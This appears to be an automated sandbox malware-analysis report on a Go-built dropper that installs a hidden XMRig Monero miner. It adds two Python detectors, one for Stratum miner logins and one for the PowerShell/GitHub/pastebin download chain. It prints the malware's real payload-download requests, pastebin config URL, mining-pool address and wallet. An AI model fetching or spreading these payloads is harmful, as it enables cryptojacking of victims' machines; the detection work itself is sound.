Source: C:\Users\user\AppData\Roaming\win_init.exe; ReversingLabs: Detection: 23%
Source: esFK2gm.exe; Virustotal: Detection: 22%
Source: esFK2gm.exe; ReversingLabs: Detection: 23%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 99.9% probability

Bitcoin Miner

                          Source: Yara match | File source: esFK2gm.exe, type: SAMPLE
                          Source: Yara match | File source: 33.2.win_init.exe.a0000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 33.0.win_init.exe.a0000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 0.0.esFK2gm.exe.990000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 30.0.win_init.exe.a0000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 30.2.win_init.exe.a0000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 0.2.esFK2gm.exe.990000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: Process Memory Space: esFK2gm.exe PID: 6424, type: MEMORYSTR
                          Source: Yara match | File source: Process Memory Space: win_init.exe PID: 916, type: MEMORYSTR
                          Source: Yara match | File source: Process Memory Space: win_init.exe PID: 6092, type: MEMORYSTR
                          Source: Yara match | File source: C:\Users\user\AppData\Roaming\win_init.exe, type: DROPPED
                          Source: Yara match | File source: dump.pcap, type: PCAP
                          Source: Yara match | File source: sslproxydump.pcap, type: PCAP
                          Source: Yara match | File source: 30.2.win_init.exe.c000160000.4.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 30.2.win_init.exe.c00015e000.7.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 30.2.win_init.exe.c00005c400.1.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 0.2.esFK2gm.exe.c000a90000.3.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 30.2.win_init.exe.c0009f0000.13.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 30.2.win_init.exe.c00015c000.5.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 30.2.win_init.exe.c00015e000.7.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 30.2.win_init.exe.c00015a000.2.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 30.2.win_init.exe.c000160000.4.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 33.2.win_init.exe.c000a8a000.14.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 00000000.00000002.2135744163.000000C000400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000000.00000002.2131272483.000000C0002B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match | File source: 0000001E.00000002.1619147975.000000C00015E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000000.00000002.2136754074.000000C000C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000021.00000002.1805169349.000000C000C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match | File source: 0000001E.00000002.1621539104.000000C000C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000000.00000002.2131272483.000000C00014A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match | File source: Process Memory Space: esFK2gm.exe PID: 6424, type: MEMORYSTR
                          Source: Yara match | File source: Process Memory Space: notepad.exe PID: 7076, type: MEMORYSTR
                          Source: Yara match | File source: Process Memory Space: win_init.exe PID: 916, type: MEMORYSTR
                          Source: Yara match | File source: Process Memory Space: win_init.exe PID: 6092, type: MEMORYSTR
                          Source: global traffic | TCP traffic: 192.168.2.7:49691 -> 45.144.212.77:3333 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"494k9wqkjkfgdod9mfnacjedcrhmmmnjtuun8ryfryyphyohmjf5sesh79uom8vfogyevyzthg86r5btgyzxmhentzkajl3","pass":"x","agent":"xmrig/6.22.2 (windows nt 10.0; win64; x64) libuv/1.49.2 msvc/2022","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/yada","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}.
                          Source: esFK2gm.exe, 00000000.00000002.2136754074.000000C000C00000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: stratum+tcp://
                          Source: esFK2gm.exe, 00000000.00000002.2136754074.000000C000C00000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: cryptonight/0
                          Source: esFK2gm.exe, 00000000.00000002.2136754074.000000C000C00000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: -o, --url=URL URL of mining server
                          Source: esFK2gm.exe, 00000000.00000002.2136754074.000000C000C00000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: Usage: xmrig [OPTIONS]
                          Source: esFK2gm.exe, 00000000.00000002.2136754074.000000C000C00000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: XMRig 6.22.2
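The login payload above is a complete Stratum handshake (newline-delimited JSON-RPC over a plain TCP socket), which is why the Suricata ETPRO CoinMiner rule in the Networking section fires on the very first data packet: the wallet, the miner agent string and the supported-algorithm list are all sent in the clear. The following is an added example written for this report, not Joe Sandbox or XMRig code. It parses captured TCP payloads, recognises a Stratum login, and extracts those three fields together with a few indicators. The first flow carries the payload from this report (lower-cased, as the sandbox prints it); the other two flows are constructed controls.

```python
"""Flag Stratum (JSON-RPC over TCP) miner logins in captured payloads.

Added example for this report, not Joe Sandbox or XMRig code. The first
flow carries the login payload from the report's TCP evidence (the sandbox
prints payloads lower-cased); the remaining flows are constructed controls.
"""
import json
import re
from typing import Any, Dict, List, Optional, Tuple

# After case-folding, the only character a Base58 Monero address can never
# contain is '0'. A standard address is 95 characters and starts with '4',
# an integrated address is 106 characters.
_FOLDED_BASE58_RE = re.compile(r"^[1-9a-z]+$", re.IGNORECASE)
_MONERO_LENGTHS = (95, 106)

# Payload copied from the report (trailing newline added: Stratum is line-delimited).
XMRIG_LOGIN = (
    b'{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"494k9wqkjkfgdod9mfnacjedcrhmmmnjtuun8ryfryyphyohmjf5sesh79uom8vfogyevyzthg86r5btgyzxmhentzkajl3",'
    b'"pass":"x","agent":"xmrig/6.22.2 (windows nt 10.0; win64; x64) libuv/1.49.2 msvc/2022",'
    b'"algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/yada","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}\n'
)

# Constructed flow records: (src, dst, first client payload on the connection).
SAMPLE_FLOWS: List[Tuple[str, str, bytes]] = [
    ("192.168.2.7:49691", "45.144.212.77:3333", XMRIG_LOGIN),
    # constructed control: JSON-RPC on a "miner" port that is not a login
    ("192.168.2.7:50000", "10.0.0.5:3333", b'{"id":7,"jsonrpc":"2.0","method":"getinfo","params":{}}\n'),
    # constructed control: start of a TLS ClientHello, not JSON at all
    ("192.168.2.7:50001", "10.0.0.6:443", b"\x16\x03\x01\x02\x00\x01\x00\x01\xfc\x03\x03"),
]


def parse_stratum_login(payload: bytes) -> Optional[Dict[str, Any]]:
    """Return wallet/agent/algo list if the payload opens with a Stratum 'login', else None.

    raw_decode is used instead of json.loads so the trailing newline (or any
    second pipelined message) of line-delimited JSON-RPC does not break parsing.
    """
    try:
        msg, _end = json.JSONDecoder().raw_decode(payload.decode("utf-8").lstrip())
    except (UnicodeDecodeError, ValueError):
        return None
    if not isinstance(msg, dict) or msg.get("method") != "login":
        return None
    params = msg.get("params")
    if not isinstance(params, dict):
        return None
    return {
        "wallet": str(params.get("login", "")),
        "agent": str(params.get("agent", "")),
        "algos": [str(a) for a in params.get("algo") or []],
    }


def looks_like_monero_address(value: str) -> bool:
    """Length/prefix/alphabet check that survives the sandbox's case-folding."""
    return (len(value) in _MONERO_LENGTHS and value[0] in "48"
            and _FOLDED_BASE58_RE.match(value) is not None)


def classify_flow(src: str, dst: str, payload: bytes) -> Optional[Dict[str, Any]]:
    """Turn one flow into an alert record, or None if it is not a Stratum login."""
    login = parse_stratum_login(payload)
    if login is None:
        return None
    indicators = ["stratum-login"]
    if looks_like_monero_address(login["wallet"]):
        indicators.append("monero-wallet")
    if login["agent"].lower().startswith("xmrig/"):
        indicators.append("xmrig-agent")
    if any(a.startswith("rx/") for a in login["algos"]):
        indicators.append("randomx-algo")
    return {"src": src, "dst": dst, "wallet": login["wallet"],
            "agent": login["agent"], "indicators": indicators}


def scan_flows(flows: List[Tuple[str, str, bytes]]) -> List[Dict[str, Any]]:
    """Run classify_flow over every flow and keep the hits."""
    hits = []
    for src, dst, payload in flows:
        hit = classify_flow(src, dst, payload)
        if hit is not None:
            hits.append(hit)
    return hits


if __name__ == "__main__":
    for hit in scan_flows(SAMPLE_FLOWS):
        print(f'{hit["src"]} -> {hit["dst"]}: {", ".join(hit["indicators"])}; agent={hit["agent"]}')
```

Only the first client payload of each connection is examined; that is enough for Stratum, where `login` is always the first message, and it keeps the check cheap enough to run inline on a proxy or on every TCP stream of a pcap. The destination port is deliberately not part of the logic, since pools listen on arbitrary ports and the 3333 seen here is merely customary.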
                          Source: unknown | HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.7:49690 version: TLS 1.2
                          Source: unknown | HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.7:49692 version: TLS 1.2
                          Source: unknown | HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.7:49697 version: TLS 1.2
                          Source: unknown | HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.7:49700 version: TLS 1.2
                          Source: esFK2gm.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData

                          Networking

                          Source: C:\Windows\System32\notepad.exe | Network Connect: 45.144.212.77 3333
                          Source: unknown | DNS query: name: pastebin.com
                          Source: esFK2gm.exe (00000000.00000002.2128334068.0000000000C3B000.00000002.00000001.01000000.00000003.sdmp); win_init.exe (0000001E.00000002.1608376264.000000000034B000.00000002.00000001.01000000.0000000C.sdmp and 00000021.00000000.1666477319.000000000034B000.00000002.00000001.01000000.0000000C.sdmp); esFK2gm.exe (file); win_init.exe.5.dr | String found in binary or memory (identical in all five): m=nil base netdnsdomaingophertelnetreturn.local.onionip+netCommonX25519%w%.0wAcceptServerRGBA64Gray16BitBltEndDocLineToSaveDCMulDivrdtscppopcntcmd/goheaderAnswerLengthsecretSTREETavx512rdrandrdseedAppDataRoamingcmd.exedwm.exefloat32float64abortedCopySidFreeSidSleepExWSARecvWSASendconnectsignal number UpgradeTrailersocks5hHEADERSReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGname %q:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTTuesdayJanuaryOctoberMUI_StdMUI_DltconsolePATHEXT19531259765625invaliduintptrChanDir Value>ConvertforcegcallocmWcpuprofallocmRunknowngctraceIO waitrunningsyscallwaitingforevernetworkUNKNOWN:events, goid= s=nil
                          Note: the ".onion" that triggers the Tor signature here sits in a run of Go net package string constants ("gopher", "telnet", ".local", "ip+net"), next to Go runtime markers such as GODEBUG and goid=. Go's resolver refuses to send .onion names to DNS, so this literal is present in every Go-built binary; together with the Go-http-client User-Agent in the requests below it shows that both esFK2gm.exe and win_init.exe are Go builds, not that the sample contacts a Tor hidden service.
                          Source: global traffic | TCP traffic: 192.168.2.7:49691 -> 45.144.212.77:3333
                          Source: Joe Sandbox View | IP Address: 104.20.4.235
                          Source: Joe Sandbox View | IP Address: 185.199.108.133
                          Source: Joe Sandbox View | IP Address: 140.82.121.3
                          Source: Joe Sandbox View | ASN Name: HPC-MVM-ASHU
                          Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                          Source: Network traffic | Suricata IDS: 2826930 - Severity 2 - ETPRO COINMINER XMR CoinMiner Usage : 192.168.2.7:49691 -> 45.144.212.77:3333
                          Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.7:49692 -> 185.199.108.133:443
                          Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.7:49690 -> 140.82.121.3:443
                          Source: Network traffic | Suricata IDS: 1810003 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP PE File Download : 185.199.108.133:443 -> 192.168.2.7:49692
                          Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.7:49697 -> 140.82.121.3:443
                          Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.7:49700 -> 185.199.108.133:443
                          Source: Network traffic | Suricata IDS: 1810003 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP PE File Download : 185.199.108.133:443 -> 192.168.2.7:49700
                          Source: global traffic | HTTP traffic detected (4 times): GET /letzchipman7/fallen/releases/download/v1.0.0/win_init.exe HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682; Host: github.com; Connection: Keep-Alive
                          Source: global traffic | HTTP traffic detected (4 times): GET /github-production-release-asset-2e65be/941574414/b85117f6-f40e-4d84-a04c-3aa968aaa835?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250308%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250308T150112Z&X-Amz-Expires=300&X-Amz-Signature=2f50835d107e60196aeecf6b023e020f551313dafca893d142bfa1470b05bf57&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dwin_init.exe&response-content-type=application%2Foctet-stream HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682; Host: objects.githubusercontent.com; Connection: Keep-Alive
                          Source: unknown | TCP traffic detected without corresponding DNS query (10 times): 45.144.212.77
                          Source: unknown | UDP traffic detected without corresponding DNS query (5 times): 1.1.1.1
                          Source: global traffic | HTTP traffic detected (3 times): GET /letzchipman7/fallen/releases/download/v1.0.0/xmrig-hidden.exe HTTP/1.1; Host: github.com; User-Agent: Go-http-client/1.1; Accept-Encoding: gzip
                          Source: global traffic | HTTP traffic detected (3 times): GET /github-production-release-asset-2e65be/941574414/ea8c5442-d9b8-4ab4-85a4-be28e4f102f4?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250308%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250308T150116Z&X-Amz-Expires=300&X-Amz-Signature=0f37b4cbb455519c9df494d17094b758c6c2402fd8b2b9f465fe91e23d49f9f3&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dxmrig-hidden.exe&response-content-type=application%2Foctet-stream HTTP/1.1; Host: objects.githubusercontent.com; User-Agent: Go-http-client/1.1; Referer: https://github.com/letzchipman7/fallen/releases/download/v1.0.0/xmrig-hidden.exe; Accept-Encoding: gzip
                          Source: global traffic | HTTP traffic detected (8 times): GET /raw/i3kvksAW HTTP/1.1; Host: pastebin.com; User-Agent: Go-http-client/1.1; Accept-Encoding: gzip
                          Source: global traffic | DNS traffic detected: DNS query: github.com
                          Source: global traffic | DNS traffic detected: DNS query: objects.githubusercontent.com
                          Source: global traffic | DNS traffic detected: DNS query: pastebin.com
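The requests above form the whole delivery chain: PowerShell (its own User-Agent) pulls win_init.exe from a GitHub release, the release CDN names the file only in a response-content-disposition query parameter, and the Go-built win_init.exe then fetches xmrig-hidden.exe and repeatedly reads a pastebin raw URL for its configuration. The following is an added example written for this report, not Joe Sandbox's or the sample's code: it parses raw HTTP/1.1 requests, works out the real object name even for the CDN redirect target, and tags the requests that match this chain. The sample requests are reconstructed from the entries above (the originals were inside TLS, so in practice they come from sslproxydump.pcap or a forward proxy log); the browser request at the end is a constructed control.

```python
"""Triage raw HTTP requests for the PowerShell/GitHub/pastebin download chain.

Added example for this report, not Joe Sandbox or the sample's code. The
requests are reconstructed from the report's 'HTTP traffic detected' entries;
the final browser request is a constructed benign control.
"""
import re
from typing import Any, Dict, List, Tuple
from urllib.parse import parse_qs, urlsplit

PE_SUFFIXES = (".exe", ".dll", ".scr")
GITHUB_RELEASE_HOSTS = {"github.com", "objects.githubusercontent.com"}
_FILENAME_RE = re.compile(r'filename="?([^";]+)', re.IGNORECASE)

SAMPLE_REQUESTS = [
    "GET /letzchipman7/fallen/releases/download/v1.0.0/win_init.exe HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682\r\n"
    "Host: github.com\r\nConnection: Keep-Alive\r\n\r\n",
    # the release-CDN redirect target: the file name is only in the query string
    "GET /github-production-release-asset-2e65be/941574414/b85117f6-f40e-4d84-a04c-3aa968aaa835"
    "?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250308%2Fus-east-1%2Fs3%2Faws4_request"
    "&X-Amz-Date=20250308T150112Z&X-Amz-Expires=300&X-Amz-Signature=2f50835d107e60196aeecf6b023e020f551313dafca893d142bfa1470b05bf57"
    "&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dwin_init.exe"
    "&response-content-type=application%2Foctet-stream HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682\r\n"
    "Host: objects.githubusercontent.com\r\nConnection: Keep-Alive\r\n\r\n",
    "GET /letzchipman7/fallen/releases/download/v1.0.0/xmrig-hidden.exe HTTP/1.1\r\n"
    "Host: github.com\r\nUser-Agent: Go-http-client/1.1\r\nAccept-Encoding: gzip\r\n\r\n",
    "GET /raw/i3kvksAW HTTP/1.1\r\nHost: pastebin.com\r\nUser-Agent: Go-http-client/1.1\r\n"
    "Accept-Encoding: gzip\r\n\r\n",
    # constructed control: a browser opening the repository page
    "GET /letzchipman7/fallen HTTP/1.1\r\nHost: github.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/128.0\r\n\r\n",
]


def parse_request(raw: str) -> Dict[str, Any]:
    """Split a raw HTTP/1.1 request into method, path, query and lower-cased header names."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    parts = urlsplit(target)
    headers: Dict[str, str] = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": parts.path, "query": parts.query, "headers": headers}


def effective_filename(req: Dict[str, Any]) -> str:
    """Name of the object really being fetched: the filename a
    response-content-disposition query parameter asks the CDN to serve,
    otherwise the last path segment. Lower-cased for suffix matching."""
    disposition = parse_qs(req["query"]).get("response-content-disposition", [""])[0]
    match = _FILENAME_RE.search(disposition)
    if match:
        return match.group(1).lower()
    return req["path"].rsplit("/", 1)[-1].lower()


def triage(req: Dict[str, Any]) -> List[str]:
    """Tags describing why a request is interesting; empty list means benign."""
    ua = req["headers"].get("user-agent", "")
    host = req["headers"].get("host", "").lower()
    name = effective_filename(req)
    tags: List[str] = []
    if "windowspowershell/" in ua.lower() and name.endswith(PE_SUFFIXES):
        tags.append("powershell-pe-download")
    if host in GITHUB_RELEASE_HOSTS and name.endswith(PE_SUFFIXES):
        tags.append("github-release-pe")
    if host == "pastebin.com" and req["path"].startswith("/raw/"):
        tags.append("pastebin-raw-fetch")
    if ua.startswith("Go-http-client/"):
        tags.append("go-http-client")
    return tags


def triage_all(raws: List[str]) -> List[Tuple[str, str, List[str]]]:
    """(host, object name, tags) for every request that earned at least one tag."""
    findings = []
    for raw in raws:
        req = parse_request(raw)
        tags = triage(req)
        if tags:
            findings.append((req["headers"].get("host", ""), effective_filename(req), tags))
    return findings


if __name__ == "__main__":
    for host, name, tags in triage_all(SAMPLE_REQUESTS):
        print(f"{host:32} {name:18} {', '.join(tags)}")
```

Resolving the name through the disposition parameter matters because the objects.githubusercontent.com path is an opaque asset id; a rule that only looks at the path suffix would miss the actual PE download and fire only on the initial 302 request to github.com. The go-http-client tag is informational on its own (plenty of legitimate tooling is written in Go) and is meant to be read together with the pastebin or PE tags on the same host.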
                          Source: svchost.exe, 0000000D.00000002.2131806167.000001D639800000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.ver)
                          Source: edb.log.13.dr | String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                          Source: powershell.exe, 00000005.00000002.1303391671.000001BF25817000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1491070014.0000022387B2C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://github.com
                          Source: powershell.exe, 00000005.00000002.1364575138.000001BF34401000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1364575138.000001BF342CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1595093978.00000272101B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1498144988.00000272019B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1595093978.000002721007C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
                          Source: powershell.exe, 00000005.00000002.1303391671.000001BF25867000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1491070014.0000022387B79000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://objects.githubusercontent.com
                          Source: powershell.exe, 00000009.00000002.1498144988.0000027200222000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
                          Source: svchost.exe, 0000000D.00000002.2130300430.000001D6342B1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/enumeration/Enumerate
                          Source: powershell.exe, 00000005.00000002.1303391671.000001BF24251000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1498144988.0000027200001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1491070014.0000022387101000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1671666039.000001314869D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: powershell.exe, 00000009.00000002.1498144988.0000027200222000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                          Source: svchost.exe, 00000012.00000002.1440886455.0000025DCC213000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.bingmapsportal.com
                          Source: powershell.exe, 00000005.00000002.1303391671.000001BF24251000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1498144988.0000027200001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1491070014.0000022387101000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1671666039.0000013148688000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1671666039.000001314869D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
                          Source: svchost.exe, 00000012.00000002.1441044858.0000025DCC257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.1440158956.0000025DCC256000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                          Source: powershell.exe, 00000009.00000002.1595093978.000002721007C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
                          Source: powershell.exe, 00000009.00000002.1595093978.000002721007C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
                          Source: powershell.exe, 00000009.00000002.1595093978.000002721007C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
                          Source: svchost.exe, 00000012.00000002.1441044858.0000025DCC257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.1440158956.0000025DCC256000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/
                          Source: svchost.exe, 00000012.00000003.1431448776.0000025DCC25D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.1441135085.0000025DCC27F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.1440062439.0000025DCC240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.1431958185.0000025DCC259000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.1431283067.0000025DCC269000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.1441001888.0000025DCC241000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                          Source: svchost.exe, 00000012.00000002.1441044858.0000025DCC257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.1440158956.0000025DCC256000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                          Source: svchost.exe, 00000012.00000003.1431338492.0000025DCC264000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.1441110879.0000025DCC265000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                          Source: svchost.exe, 00000012.00000002.1441044858.0000025DCC257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.1440158956.0000025DCC256000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                          Source: svchost.exe, 00000012.00000003.1431958185.0000025DCC259000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.1431283067.0000025DCC269000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
                          Source: svchost.exe, 00000012.00000002.1441044858.0000025DCC257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.1440158956.0000025DCC256000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                          Source: svchost.exe, 00000012.00000003.1431338492.0000025DCC264000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.1440935876.0000025DCC22B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.1441110879.0000025DCC265000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                          Source: svchost.exe, 00000012.00000002.1441044858.0000025DCC257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.1440158956.0000025DCC256000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                          Source: svchost.exe, 00000012.00000002.1441044858.0000025DCC257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.1440158956.0000025DCC256000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                          Source: svchost.exe, 00000012.00000002.1441044858.0000025DCC257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.1440158956.0000025DCC256000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                          Source: svchost.exe, 00000012.00000003.1440062439.0000025DCC240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.1441001888.0000025DCC241000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                          Source: svchost.exe, 00000012.00000002.1441044858.0000025DCC257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.1440158956.0000025DCC256000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
